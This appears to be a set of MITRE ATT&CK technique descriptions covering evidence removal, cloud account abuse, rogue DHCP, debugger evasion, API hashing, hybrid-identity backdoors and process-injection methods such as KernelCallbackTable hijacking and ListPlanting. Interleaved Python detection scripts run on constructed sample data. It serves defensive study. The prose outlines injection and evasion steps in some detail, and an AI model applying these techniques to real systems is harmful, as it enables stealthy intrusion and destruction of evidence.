| Description |
|---|
Adversaries may modify mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails or logs generated by the application or operating system, such as export requests.
Adversaries may manipulate email mailbox data to remove logs and artifacts, such as evidence of [Phishing](https://attack.mitre.org/techniques/T1566)/[Internal Spearphishing](https://attack.mitre.org/techniques/T1534), [Email Collection](https://attack.mitre.org/techniques/T1114), [Mail Protocols](https://attack.mitre.org/techniques/T1071/003) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). For example, to remove evidence on Exchange servers adversaries have used the ExchangePowerShell [PowerShell](https://attack.mitre.org/techniques/T1059/001) module, including `Remove-MailboxExportRequest` to remove evidence of mailbox exports.(Citation: Volexity SolarWinds)(Citation: ExchangePowerShell Module) On Linux and macOS, adversaries may also delete emails through a command line utility called `mail` or use [AppleScript](https://attack.mitre.org/techniques/T1059/002) to interact with APIs on macOS.(Citation: Cybereason Cobalt Kitty 2017)(Citation: mailx man page)
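A defender-side illustration of the Exchange case above, added here as an example and not part of the ATT&CK text: the script walks admin audit log records, reports every `Remove-MailboxExportRequest`, and raises the severity when the same caller created an export request shortly before. The records are constructed inline; their field names (RunDate, Caller, CmdletName, ObjectModified) are modelled on Exchange admin audit log output and are an assumption of this example, as are the account and mailbox names.

```python
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed admin audit log records (field names assumed, not captured from a real server)
SAMPLE_AUDIT = [
    {"RunDate": "2024-03-01T02:10:00", "Caller": "corp\\svc-backup",
     "CmdletName": "New-MailboxExportRequest", "ObjectModified": "corp.example/Users/jdoe"},
    {"RunDate": "2024-03-01T02:25:00", "Caller": "corp\\svc-backup",
     "CmdletName": "Remove-MailboxExportRequest", "ObjectModified": "corp.example/Users/jdoe"},
    {"RunDate": "2024-03-01T09:00:00", "Caller": "corp\\helpdesk1",
     "CmdletName": "Get-Mailbox", "ObjectModified": "corp.example/Users/asmith"},
    {"RunDate": "2024-03-02T11:00:00", "Caller": "corp\\admin2",
     "CmdletName": "Remove-MailboxExportRequest", "ObjectModified": "corp.example/Users/asmith"},
]


def find_export_cleanup(records: List[Dict[str, str]],
                        window: timedelta = timedelta(hours=24)) -> List[Dict[str, str]]:
    """Report export-request removals; 'high' when the caller also created an export within `window`."""
    rows = sorted(records, key=lambda r: r["RunDate"])   # ISO-8601 strings sort chronologically
    findings: List[Dict[str, str]] = []
    for r in rows:
        if r["CmdletName"] != "Remove-MailboxExportRequest":
            continue
        removed_at = datetime.fromisoformat(r["RunDate"])
        prior_export = any(
            x["CmdletName"] == "New-MailboxExportRequest"
            and x["Caller"] == r["Caller"]
            and timedelta(0) <= removed_at - datetime.fromisoformat(x["RunDate"]) <= window
            for x in rows
        )
        findings.append({
            "time": r["RunDate"],
            "caller": r["Caller"],
            "target": r["ObjectModified"],
            # an export followed by removal of its record is the export-and-cover-tracks pattern
            "severity": "high" if prior_export else "medium",
        })
    return findings


def demo() -> List[Dict[str, str]]:
    return find_export_cleanup(SAMPLE_AUDIT)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['time']} {f['severity']:6} {f['caller']} removed export of {f['target']}")
```

Every removal is worth a ticket on its own, since export requests are normally left for the built-in retention period rather than deleted by hand; the export-then-remove pairing is what distinguishes routine administration from evidence removal.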
| Description |
|---|
Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system from behaviors that require network connections, such as [Remote Services](https://attack.mitre.org/techniques/T1021) or [External Remote Services](https://attack.mitre.org/techniques/T1133). Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries.
Network connection history may be stored in various locations on a system. For example, RDP connection history may be stored in Windows Registry values under (Citation: Microsoft RDP Removal):
* HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default
* HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers
Windows may also store information about recent RDP connections in files such as `C:\Users\%username%\Documents\Default.rdp` and `C:\Users\%username%\AppData\Local\Microsoft\Terminal Server Client\Cache\`.(Citation: Moran RDPieces) Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in `/Library/Logs` and/or `/var/log/`).(Citation: Apple Culprit Access)(Citation: FreeDesktop Journal)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)
Malicious network connections may also require changes to network configuration settings, such as [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004) or tampering to enable [Proxy](https://attack.mitre.org/techniques/T1090). Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis.
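As an added detection example (not part of the ATT&CK description), the following Python scans endpoint telemetry for deletions of the RDP history artifacts listed above: the `Terminal Server Client\Default` and `\Servers` registry keys and the `Default.rdp` / `Terminal Server Client\Cache` files. The events are constructed inline and use Sysmon-style field names (Event ID 12 registry object delete, Event IDs 23/26 file delete); that shape, the SIDs, paths and user names are assumptions of this example.

```python
from typing import Dict, List

# Substrings (lower-cased) identifying the RDP history locations named in the description
RDP_REGISTRY_MARKERS = (
    "\\software\\microsoft\\terminal server client\\default",
    "\\software\\microsoft\\terminal server client\\servers",
)
RDP_FILE_MARKERS = (
    "\\documents\\default.rdp",
    "\\appdata\\local\\microsoft\\terminal server client\\cache\\",
)

# Constructed Sysmon-style events (field names and values are assumed sample data)
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 12, "EventType": "DeleteKey",
     "TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Terminal Server Client\\Servers\\fileserver01",
     "Image": "C:\\Windows\\System32\\reg.exe", "User": "CORP\\jdoe"},
    {"EventID": 12, "EventType": "CreateKey",
     "TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Terminal Server Client\\Servers\\fileserver02",
     "Image": "C:\\Windows\\System32\\mstsc.exe", "User": "CORP\\jdoe"},
    {"EventID": 23, "TargetFilename": "C:\\Users\\jdoe\\Documents\\Default.rdp",
     "Image": "C:\\Windows\\System32\\cmd.exe", "User": "CORP\\jdoe"},
    {"EventID": 23, "TargetFilename": "C:\\Users\\jdoe\\Downloads\\notes.txt",
     "Image": "C:\\Windows\\explorer.exe", "User": "CORP\\jdoe"},
]


def detect_rdp_history_clearing(events: List[Dict]) -> List[str]:
    """Return one finding per deletion that touches a known RDP connection-history artifact."""
    findings: List[str] = []
    for e in events:
        if e.get("EventID") == 12 and e.get("EventType") in ("DeleteKey", "DeleteValue"):
            target = e["TargetObject"].lower()
            if any(marker in target for marker in RDP_REGISTRY_MARKERS):
                findings.append(f"registry: {e['User']} via {e['Image']} deleted {e['TargetObject']}")
        elif e.get("EventID") in (23, 26):
            path = e["TargetFilename"].lower()
            if any(marker in path for marker in RDP_FILE_MARKERS):
                findings.append(f"file: {e['User']} via {e['Image']} deleted {e['TargetFilename']}")
    return findings


def demo() -> List[str]:
    return detect_rdp_history_clearing(SAMPLE_EVENTS)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Creation of these keys by `mstsc.exe` is normal and is deliberately ignored; the signal is a delete, especially from a shell, `reg.exe` or a scripting host rather than the RDP client itself.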
| Description |
|---|
| Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) In some instances, artifacts of persistence may also be removed once an adversary’s persistence is executed in order to prevent errors with the new instance of the malware.(Citation: NCC Group Team9 June 2020) |
| Description |
|---|
| Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, MEGA, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud) Creating [Cloud Accounts](https://attack.mitre.org/techniques/T1585/003) may also require adversaries to establish [Email Accounts](https://attack.mitre.org/techniques/T1585/002) to register with the cloud provider. |
| Description |
|---|
| Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud) A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021) |
| Description |
|---|
| Adversaries may search public code repositories for information about victims that can be used during targeting. Victims may store code in repositories on various third-party websites such as GitHub, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git. Adversaries may search public code repositories for information about a victim. Public code repositories can often be a source of general information about victims, such as commonly used programming languages and libraries as well as the names of employees. Adversaries may also identify more sensitive data, including accidentally leaked credentials or API keys.(Citation: GitHub Cloud Service Credentials) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)). **Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1213/003), which focuses on [Collection](https://attack.mitre.org/tactics/TA0009) from private and internally hosted code repositories. |
| Description |
|---|
Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the victim network. By achieving the adversary-in-the-middle (AiTM) position, adversaries may collect network communications, including passed credentials, especially those sent over insecure, unencrypted protocols. This may also enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).
DHCP is based on a client-server model and has two functionalities: a protocol for providing network configuration settings from a DHCP server to a client and a mechanism for allocating network addresses to clients.(Citation: rfc2131) The typical server-client interaction is as follows:
1. The client broadcasts a `DISCOVER` message.
2. The server responds with an `OFFER` message, which includes an available network address.
3. The client broadcasts a `REQUEST` message, which includes the network address offered.
4. The server acknowledges with an `ACK` message and the client receives the network configuration parameters.
Adversaries may spoof as a rogue DHCP server on the victim network, from which legitimate hosts may receive malicious network configurations. For example, malware can act as a DHCP server and provide adversary-owned DNS servers to the victimized computers.(Citation: new_rogue_DHCP_serv_malware)(Citation: w32.tidserv.g) Through the malicious network configurations, an adversary may achieve the AiTM position, route client traffic through adversary-controlled systems, and collect information from the client network.
DHCPv6 clients can receive network configuration information without being assigned an IP address by sending an INFORMATION-REQUEST (code 11) message to the All_DHCP_Relay_Agents_and_Servers multicast address.(Citation: rfc3315) Adversaries may use their rogue DHCP server to respond to this request message with malicious network configurations.
Rather than establishing an AiTM position, adversaries may also abuse DHCP spoofing to perform a DHCP exhaustion attack (i.e., [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)) by generating many broadcast DISCOVER messages to exhaust a network’s DHCP allocation pool.
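The DISCOVER/OFFER/REQUEST/ACK exchange above gives a defender three concrete things to watch in server replies. As an added example (not part of the ATT&CK description), the following Python parses raw DHCPv4 packets and flags OFFER/ACK messages whose server identifier is not on an allowlist, DNS options that point at unsanctioned resolvers, and a single transaction ID answered by more than one server. The packets are constructed inline; 10.0.0.1 plays the sanctioned server, 10.0.0.250 the rogue one, and 203.0.113.7 the adversary-provided DNS server (all placeholder addresses).

```python
import ipaddress
import struct
from typing import Dict, List

DHCP_MAGIC = b"\x63\x82\x53\x63"   # RFC 2131 magic cookie that starts the option field
MSG_TYPES = {1: "DISCOVER", 2: "OFFER", 3: "REQUEST", 5: "ACK", 6: "NAK"}
OPT_DNS, OPT_MSG_TYPE, OPT_SERVER_ID, OPT_END = 6, 53, 54, 255


def _ip(raw: bytes) -> str:
    return str(ipaddress.IPv4Address(raw))


def parse_dhcp(packet: bytes) -> dict:
    """Parse the fixed BOOTP header and the TLV option area of a DHCPv4 packet."""
    if len(packet) < 240 or packet[236:240] != DHCP_MAGIC:
        raise ValueError("not a DHCP packet")
    op, _htype, _hlen, _hops, xid = struct.unpack_from("!BBBBI", packet, 0)
    options: Dict[int, bytes] = {}
    i = 240
    while i < len(packet):
        code = packet[i]
        if code == OPT_END:
            break
        if code == 0:                       # pad option carries no length byte
            i += 1
            continue
        length = packet[i + 1]
        options[code] = packet[i + 2:i + 2 + length]
        i += 2 + length
    dns = options.get(OPT_DNS, b"")
    return {
        "op": op,
        "xid": xid,
        "type": MSG_TYPES.get(options.get(OPT_MSG_TYPE, b"\x00")[0], "UNKNOWN"),
        "yiaddr": _ip(packet[16:20]),
        "server_id": _ip(options[OPT_SERVER_ID]) if OPT_SERVER_ID in options else None,
        "dns": [_ip(dns[k:k + 4]) for k in range(0, len(dns) - len(dns) % 4, 4)],
    }


def audit_dhcp_replies(packets, allowed_servers, allowed_dns) -> List[str]:
    """Flag server replies that do not come from, or do not point at, sanctioned infrastructure."""
    findings: List[str] = []
    answered_by: Dict[int, set] = {}
    for raw in packets:
        p = parse_dhcp(raw)
        if p["type"] not in ("OFFER", "ACK"):
            continue
        answered_by.setdefault(p["xid"], set()).add(p["server_id"])
        if p["server_id"] not in allowed_servers:
            findings.append(f"{p['type']} xid={p['xid']:#x} from unexpected server {p['server_id']}")
        bad_dns = [d for d in p["dns"] if d not in allowed_dns]
        if bad_dns:
            findings.append(f"{p['type']} xid={p['xid']:#x} hands out unexpected DNS {bad_dns}")
    for xid, servers in answered_by.items():
        if len(servers) > 1:   # one client transaction answered by two servers: a rogue-server signature
            findings.append(f"xid={xid:#x} answered by multiple servers {sorted(servers)}")
    return findings


def build_dhcp(msg_type: int, xid: int, yiaddr: str, server_id: str, dns: List[str]) -> bytes:
    """Build a constructed server-to-client DHCPv4 packet (op=2, BOOTREPLY) for the sample below."""
    header = struct.pack("!BBBBIHH", 2, 1, 6, 0, xid, 0, 0)
    header += b"\x00" * 4                                   # ciaddr
    header += ipaddress.IPv4Address(yiaddr).packed          # yiaddr
    header += ipaddress.IPv4Address(server_id).packed       # siaddr
    header += b"\x00" * 4                                   # giaddr
    header += b"\x00\x11\x22\x33\x44\x55" + b"\x00" * 10    # chaddr (16 bytes)
    header += b"\x00" * (64 + 128)                          # sname, file
    opts = bytes([OPT_MSG_TYPE, 1, msg_type])
    opts += bytes([OPT_SERVER_ID, 4]) + ipaddress.IPv4Address(server_id).packed
    dns_bytes = b"".join(ipaddress.IPv4Address(d).packed for d in dns)
    opts += bytes([OPT_DNS, len(dns_bytes)]) + dns_bytes + bytes([OPT_END])
    return header + DHCP_MAGIC + opts


# Constructed sample traffic: a legitimate OFFER, a competing rogue OFFER, then the legitimate ACK
SAMPLE_PACKETS = [
    build_dhcp(2, 0x1001, "10.0.0.20", "10.0.0.1", ["10.0.0.53"]),
    build_dhcp(2, 0x1001, "10.0.0.77", "10.0.0.250", ["203.0.113.7"]),
    build_dhcp(5, 0x1001, "10.0.0.20", "10.0.0.1", ["10.0.0.53"]),
]
ALLOWED_SERVERS = {"10.0.0.1"}
ALLOWED_DNS = {"10.0.0.53"}


def demo() -> List[str]:
    return audit_dhcp_replies(SAMPLE_PACKETS, ALLOWED_SERVERS, ALLOWED_DNS)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

On a real network the packets would come from a capture on UDP port 67/68; the allowlists are the only site-specific input. Switch features such as DHCP snooping enforce the same policy inline, but the passive check above also catches the DHCPv6 INFORMATION-REQUEST case if the parser is extended for the v6 message format.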
| Description |
|---|
Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.(Citation: ProcessHacker Github)
Debugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497), if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads.
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent() and NtQueryInformationProcess(), or manually checking the BeingDebugged flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW().(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
| Description |
|---|
| Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance. MFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: DarkReading FireEye SolarWinds) Similarly, an adversary with existing access to a network may register a device to Azure AD and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.(Citation: AADInternals - Device Registration)(Citation: AADInternals - Conditional Access Bypass)(Citation: Microsoft DEV-0537) Devices registered in Azure AD may be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002) on an Azure AD tenant by registering a large number of devices.(Citation: AADInternals - BPRT) |
| Description |
|---|
| Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various [Native API](https://attack.mitre.org/techniques/T1106) functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts. API functions called by malware may leave static artifacts such as strings in payload files. Defensive analysts may also uncover which functions a binary file may execute via an import address table (IAT) or other structures that help dynamically link calling code to the shared modules that provide functions.(Citation: Huntress API Hash)(Citation: IRED API Hashing) To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime. Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash) |
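The analyst's counterpart to API hashing is a precomputed lookup table: hash every export name you expect a loader to resolve under each candidate algorithm, then look up the constants recovered from a sample. The following Python is an added example, not code from the ATT&CK description or any referenced report. The three hash routines (additive ROR13 over the name with its terminating NUL, djb2, and CRC32) are common families rather than the algorithm of any specific malware, and the sample hash values are constructed from those routines for demonstration.

```python
import zlib
from typing import Callable, Dict, List, Optional, Tuple

MASK32 = 0xFFFFFFFF


def ror32(value: int, bits: int) -> int:
    """32-bit rotate right."""
    bits %= 32
    return ((value >> bits) | (value << (32 - bits))) & MASK32


def ror13_hash(name: str) -> int:
    """Additive ROR13 over the export name including the terminating NUL (one common loader convention)."""
    h = 0
    for b in name.encode("ascii") + b"\x00":
        h = (ror32(h, 13) + b) & MASK32
    return h


def djb2_hash(name: str) -> int:
    h = 5381
    for b in name.encode("ascii"):
        h = (h * 33 + b) & MASK32
    return h


def crc32_hash(name: str) -> int:
    return zlib.crc32(name.encode("ascii")) & MASK32


HASHERS: Dict[str, Callable[[str], int]] = {
    "ror13": ror13_hash,
    "djb2": djb2_hash,
    "crc32": crc32_hash,
}

# Exports an analyst would expect a loader to resolve; in practice feed it full export lists of
# kernel32.dll, ntdll.dll and friends
KNOWN_EXPORTS = [
    "LoadLibraryA", "GetProcAddress", "VirtualAlloc", "VirtualProtect",
    "WriteProcessMemory", "CreateRemoteThread", "OpenProcess", "IsDebuggerPresent",
    "NtQueryInformationProcess", "CreateFileA", "WinExec", "ExitProcess",
]


def build_tables(names: List[str], hashers: Dict[str, Callable[[str], int]]) -> Dict[str, Dict[int, str]]:
    """Precompute hash -> export name for every candidate algorithm."""
    return {alg: {fn(n): n for n in names} for alg, fn in hashers.items()}


def resolve_hashes(hashes: List[int], tables: Dict[str, Dict[int, str]]) -> Dict[int, Optional[Tuple[str, str]]]:
    """Map each recovered constant to (export name, algorithm), or None if no table knows it."""
    resolved: Dict[int, Optional[Tuple[str, str]]] = {}
    for h in hashes:
        resolved[h] = None
        for alg, table in tables.items():
            if h in table:
                resolved[h] = (table[h], alg)
                break
    return resolved


# Constructed sample: constants as they might be pulled from a binary's hash array
SAMPLE_HASHES = [
    ror13_hash("VirtualAlloc"),
    ror13_hash("WriteProcessMemory"),
    crc32_hash("CreateRemoteThread"),
    0xDEADBEEF,   # unknown value: stays unresolved
]


def demo() -> Dict[int, Optional[Tuple[str, str]]]:
    return resolve_hashes(SAMPLE_HASHES, build_tables(KNOWN_EXPORTS, HASHERS))


if __name__ == "__main__":
    for h, hit in demo().items():
        print(f"{h:#010x} -> {hit}")
```

Resolving one or two constants usually reveals which algorithm a sample uses; after that the rest of the table can be rebuilt from the DLL export lists, and the recovered import set (for instance `VirtualAlloc` followed by `WriteProcessMemory` and `CreateRemoteThread`) tells you what the loader is about to do before you ever run it.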
| Description |
|---|
| Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to [Subvert Trust Controls](https://attack.mitre.org/techniques/T1553) by not impacting execution controls such as digital signatures and notarization tickets.(Citation: Sentinel Labs) Adversaries may embed payloads in various file formats to hide payloads.(Citation: Microsoft Learn) This is similar to [Steganography](https://attack.mitre.org/techniques/T1027/003), though does not involve weaving malicious content into specific bytes and patterns related to legitimate digital media formats.(Citation: GitHub PSImage) For example, adversaries have been observed embedding payloads within or as an overlay of an otherwise benign binary.(Citation: Securelist Dtrack2) Adversaries have also been observed nesting payloads (such as executables and run-only scripts) inside a file of the same format.(Citation: SentinelLabs reversing run-only applescripts 2021) Embedded content may also be used as [Process Injection](https://attack.mitre.org/techniques/T1055) payloads used to infect benign system processes.(Citation: Trend Micro) These embedded then injected payloads may be used as part of the modules of malware designed to provide specific features such as encrypting C2 communications in support of an orchestrator module. For example, an embedded module may be injected into default browsers, allowing adversaries to then communicate via the network.(Citation: Malware Analysis Report ComRAT) |
| Description |
|---|
Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts. Many organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Azure AD includes three options for synchronizing identities between Active Directory and Azure AD(Citation: Azure AD Hybrid Identity):
* Password Hash Synchronization (PHS), in which a privileged on-premises account synchronizes user password hashes between Active Directory and Azure AD, allowing authentication to Azure AD to take place entirely in the cloud
* Pass Through Authentication (PTA), in which Azure AD authentication attempts are forwarded to an on-premises PTA agent, which validates the credentials against Active Directory
* Active Directory Federation Services (AD FS), in which a trust relationship is established between Active Directory and Azure AD
AD FS can also be used with other SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication process to AD FS and receive a token containing the hybrid users’ identity and privileges. By modifying authentication processes tied to hybrid identities, an adversary may be able to establish persistent privileged access to cloud resources.
For example, adversaries who compromise an on-premises server running a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService` process that authorizes all attempts to authenticate to Azure AD, as well as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation: AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary may edit the `Microsoft.IdentityServer.Servicehost` configuration file to load a malicious DLL that generates authentication tokens for any user with any set of claims, thereby bypassing multi-factor authentication and defined AD FS policies.(Citation: MagicWeb) In some cases, adversaries may be able to modify the hybrid identity authentication process from the cloud. For example, adversaries who compromise a Global Administrator account in an Azure AD tenant may be able to register a new PTA agent via the web console, similarly allowing them to harvest credentials and log into the Azure AD environment as any user.(Citation: Mandiant Azure AD Backdoors)
| Description |
|---|
| Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton) Adversaries have distributed legitimate applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS `postinstall` scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)) with the elevated permissions.(Citation: Application Bundle Manipulation Brandon Dalton)(Citation: wardle evilquest parti) Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include `preinst`, `postinst`, `prerm`, `postrm` scripts and run as root when executed. For Windows, the Microsoft Installer service uses `.msi` files to manage the installing, updating, and uninstalling of applications. Adversaries have leveraged `Prebuild` and `Postbuild` events to run commands before or after a build when installing .msi files.(Citation: Windows AppleJeus GReAT)(Citation: Debian Manual Maintainer Scripts) |
| Description |
|---|
Adversaries may abuse the KernelCallbackTable of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll is loaded.(Citation: Windows Process Injection KernelCallbackTable)
An adversary may hijack the execution flow of a process using the KernelCallbackTable by replacing an original callback function with a malicious payload. Modifying callback functions can be achieved in various ways involving related behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) or [Process Injection](https://attack.mitre.org/techniques/T1055) into another process.
A pointer to the memory address of the KernelCallbackTable can be obtained by locating the PEB (ex: via a call to the NtQueryInformationProcess() [Native API](https://attack.mitre.org/techniques/T1106) function).(Citation: NtQueryInformationProcess) Once the pointer is located, the KernelCallbackTable can be duplicated, and a function in the table (e.g., fnCOPYDATA) set to the address of a malicious payload (ex: via WriteProcessMemory()). The PEB is then updated with the new address of the table. Once the tampered function is invoked, the malicious payload will be triggered.(Citation: Lazarus APT January 2022)
The tampered function is typically invoked using a Windows message. After the process is hijacked and malicious code is executed, the KernelCallbackTable may also be restored to its original state by the rest of the malicious payload.(Citation: Lazarus APT January 2022) Use of the KernelCallbackTable to hijack execution flow may evade detection from security products since the execution can be masked under a legitimate process.
| Description |
|---|
Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process. Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.
List-view controls are user interface windows used to display collections of items.(Citation: Microsoft List View Controls) Information about an application's list-view settings is stored within the process' memory in a SysListView32 control.
ListPlanting (a form of message-passing "shatter attack") may be performed by copying code into the virtual address space of a process that uses a list-view control then using that code as a custom callback for sorting the listed items.(Citation: Modexp Windows Process Injection) Adversaries must first copy code into the target process’ memory space, which can be performed various ways including by directly obtaining a handle to the SysListView32 child of the victim process window (via Windows API calls such as FindWindow and/or EnumWindows) or other [Process Injection](https://attack.mitre.org/techniques/T1055) methods.
Some variations of ListPlanting may allocate memory in the target process but then use window messages to copy the payload, to avoid the use of the highly monitored WriteProcessMemory function. For example, an adversary can use the PostMessage and/or SendMessage API functions to send LVM_SETITEMPOSITION and LVM_GETITEMPOSITION messages, effectively copying a payload 2 bytes at a time to the allocated memory.(Citation: ESET InvisiMole June 2020)
Finally, the payload is triggered by sending the LVM_SORTITEMS message to the SysListView32 child of the process window, with the payload within the newly allocated buffer passed and executed as the ListView_SortItems callback.
| Description |
|---|
